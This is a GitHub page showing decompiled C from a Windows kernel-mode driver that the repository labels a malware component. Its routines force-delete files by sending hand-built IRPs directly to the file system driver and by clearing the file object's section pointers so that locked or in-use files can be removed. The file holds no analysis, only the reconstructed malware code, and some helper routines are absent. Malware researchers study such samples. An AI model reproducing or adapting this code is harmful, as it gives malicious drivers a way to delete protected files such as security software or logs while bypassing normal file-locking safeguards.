Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Driver-Malware-Component/2019-04-09-driver-functions.c
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
172 lines (167 sloc)
4.99 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ////////////////////////////////////////////////////////////////// | |
| ////////////////////////// FORCE DELETE FILES //////////////////// | |
| /////////////////////////////////////////////////////////////////// | |
| signed int __stdcall sub_401000(__int16 *a1, int a2) | |
| { | |
| signed int result; // eax@2 | |
| int v3; // eax@12 | |
| int v4; // eax@12 | |
| UNICODE_STRING DestinationString; // [sp+0h] [bp-23Ch]@9 | |
| __int16 *v6; // [sp+8h] [bp-234h]@5 | |
| int v7; // [sp+Ch] [bp-230h]@7 | |
| int v8; // [sp+10h] [bp-22Ch]@7 | |
| int v9; // [sp+14h] [bp-228h]@1 | |
| int v10; // [sp+18h] [bp-224h]@1 | |
| __int16 *v11; // [sp+1Ch] [bp-220h]@5 | |
| __int16 *v12; // [sp+20h] [bp-21Ch]@5 | |
| __int16 v13; // [sp+26h] [bp-216h]@6 | |
| int v14; // [sp+28h] [bp-214h]@9 | |
| PVOID Object; // [sp+2Ch] [bp-210h]@9 | |
| unsigned __int16 v16; // [sp+30h] [bp-20Ch]@1 | |
| char v17; // [sp+32h] [bp-20Ah]@1 | |
| WCHAR SourceString; // [sp+34h] [bp-208h]@9 | |
| v16 = 0; | |
| memset(&v17, 0, 0x206u); | |
| v10 = 0; | |
| v9 = 0; | |
| if ( (signed int)KeGetCurrentIrql() < 2 ) | |
| { | |
| if ( a1[1] == 58 ) | |
| { | |
| v11 = a1; | |
| v12 = (__int16 *)&v16; | |
| v6 = (__int16 *)&v16; | |
| do | |
| { | |
| v13 = *v11; | |
| *v12 = v13; | |
| ++v11; | |
| ++v12; | |
| } | |
| while ( v13 ); | |
| if ( sub_4016A0(v16, &v7, &v8) ) | |
| { | |
| RtlInitUnicodeString(&DestinationString, &SourceString); | |
| v14 = irpcreate_file(&DestinationString, 0x100000, 128, 3, 1, 96, v7, v8, (int)&Object); | |
| DbgPrint("IrpFileCreate returned [%08X]\n", v14); | |
| if ( v14 >= 0 ) | |
| { | |
| if ( a2 ) | |
| { | |
| DbgPrint("Force Delete ...\n"); | |
| v10 = **((_DWORD **)Object + 5); | |
| v9 = *(_DWORD *)(*((_DWORD *)Object + 5) + 8); | |
| **((_DWORD **)Object + 5) = 0; | |
| *(_DWORD *)(*((_DWORD *)Object + 5) + 8) = 0; | |
| } | |
| v3 = IoGetBaseFileSystemDeviceObject(Object); | |
| v14 = irp_set_attrib(Object, v3, 128); | |
| DbgPrint("IrpSetFileAttributes returned [%08X]\n", v14); | |
| v4 = IoGetBaseFileSystemDeviceObject(Object); | |
| v14 = irp_file_delete((struct _FILE_OBJECT *)Object, v4); | |
| DbgPrint("IrpFileDelete returned [%08X]\n", v14); | |
| if ( a2 ) | |
| { | |
| **((_DWORD **)Object + 5) = v10; | |
| *(_DWORD *)(*((_DWORD *)Object + 5) + 8) = v9; | |
| } | |
| ObfDereferenceObject(Object); | |
| } | |
| result = v14; | |
| } | |
| else | |
| { | |
| result = -1073741823; | |
| } | |
| } | |
| else | |
| { | |
| result = -1073741811; | |
| } | |
| } | |
| else | |
| { | |
| result = -1073741823; | |
| } | |
| return result; | |
| } | |
| ////////////////////////////////////////////////////////////////// | |
| /////////////// FILE DELETER VIA IRP | |
| ////////////////////////////////////////////////////////////////// | |
| unsigned int __stdcall irp_delete_alloc(struct _FILE_OBJECT *a1, int a2) | |
| { | |
| unsigned int result; // eax@2 | |
| struct _KEVENT Event; // [sp+0h] [bp-28h]@1 | |
| unsigned int v4; // [sp+10h] [bp-18h]@3 | |
| int v5; // [sp+18h] [bp-10h]@3 | |
| int v6; // [sp+1Ch] [bp-Ch]@3 | |
| PIRP IRP; // [sp+20h] [bp-8h]@1 | |
| char v8; // [sp+27h] [bp-1h]@3 | |
| KeInitializeEvent(&Event, SynchronizationEvent, 0); | |
| IRP = IoAllocateIrp(*(_BYTE *)(a2 + 48), 0); | |
| if ( IRP ) | |
| { | |
| IRP->MdlAddress = 0; | |
| IRP->Flags |= IRP_MJ_QUERY_SECURITY; | |
| IRP->RequestorMode = 0; | |
| IRP->UserIosb = (PIO_STATUS_BLOCK)&v4; | |
| IRP->UserEvent = &Event; | |
| IRP->PendingReturned = 0; | |
| IRP->Cancel = 0; | |
| IRP->CancelRoutine = 0; | |
| IRP->Tail.Overlay.Thread = KeGetCurrThread(); | |
| IRP->Tail.Overlay.AuxiliaryBuffer = 0; | |
| IRP->Tail.Overlay.OriginalFileObject = a1; | |
| IRP->AssociatedIrp.IrpCount = (LONG)&v8; | |
| v8 = 1; | |
| v6 = IoGetNextIrpStackLocation((int)IRP); | |
| *(_BYTE *)v6 = IRP_MJ_SET_INFORMATION; | |
| *(_DWORD *)(v6 + 20) = a2; | |
| *(_DWORD *)(v6 + 24) = a1; | |
| *(_DWORD *)(v6 + 8) = IRP_MJ_FILE_SYSTEM_CONTROL; | |
| *(_DWORD *)(v6 + 4) = IRP_MJ_CREATE_NAMED_PIPE; | |
| *(_DWORD *)(v6 + 12) = a1; | |
| sub_401920((int)IRP, (int)sub_401850, 0, 1, 1u, 1); | |
| v5 = sub_4015C0(0, a2, (int)IRP); | |
| if ( v5 == 259 ) | |
| KeWaitForSingleObject(&Event, 0, 0, 1u, 0); | |
| result = v4; | |
| } | |
| else | |
| { | |
| result = 0xC000009A; | |
| } | |
| return result; | |
| } | |
| //////////////////////////////////////////////////// | |
| //////////////// PROCESSEOR IRPSTACKLOCATION /////// | |
| //////////////////////////////////////////////////// | |
| signed int __stdcall sub_4015C0(int a1, int a2, int a3) | |
| { | |
| char v3; // ST1B_1@1 | |
| signed int result; // eax@2 | |
| int (__stdcall *v5)(int, int); // ST10_4@5 | |
| int v6; // ST0C_4@5 | |
| int v7; // [sp+8h] [bp-Ch]@3 | |
| v3 = *(_BYTE *)(a3 + 35) - 1; | |
| *(_BYTE *)(a3 + 35) = v3; | |
| if ( v3 > 0 ) | |
| { | |
| v7 = IoGetNextIrpStackLocation(a3); | |
| *(_DWORD *)(a3 + 96) = v7; | |
| *(_DWORD *)(v7 + 20) = a2; | |
| if ( !a1 ) | |
| a1 = *(_DWORD *)(a2 + 8); | |
| DbgPrint("Normal Call MJ[%d] %p\n", *(_BYTE *)v7, *(_DWORD *)(a1 + 4 * *(_BYTE *)v7 + 56)); | |
| v5 = *(int (__stdcall **)(int, int))(a1 + 4 * *(_BYTE *)v7 + 56); | |
| __guard_check_icall_fptr(v5); | |
| v6 = v5(a2, a3); | |
| DbgPrint("FsCallDriver returned [%08X]\n", v6); | |
| result = v6; | |
| } | |
| else | |
| { | |
| result = -1073741823; | |
| } | |
| return result; | |
| } |